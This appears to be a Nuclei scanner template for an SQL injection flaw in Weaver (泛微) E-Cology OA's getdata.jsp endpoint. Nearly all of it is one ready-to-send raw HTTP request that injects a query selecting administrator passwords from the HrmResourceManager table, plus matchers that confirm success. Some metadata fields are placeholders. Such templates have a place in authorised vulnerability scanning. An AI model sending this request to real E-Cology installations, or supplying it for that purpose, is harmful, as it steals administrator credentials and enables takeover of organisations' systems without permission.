id: E-Cology-getdata-Sql
info:
  name: 泛微OA E-Cology getdata.jsp SQL注入漏洞
  author: weehhd
  severity: high
  description: https://www.fiversec.com/posts/fa43982c.html
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |
        GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Accept: text/plain, */*; q=0.01
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: ecology_JSessionId=abcf4S9c0haYrfspXn5Wy; testBanCookie=test
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
      - type: regex
        part: body
        regex:
          - "[a-zA-Z0-9]+"
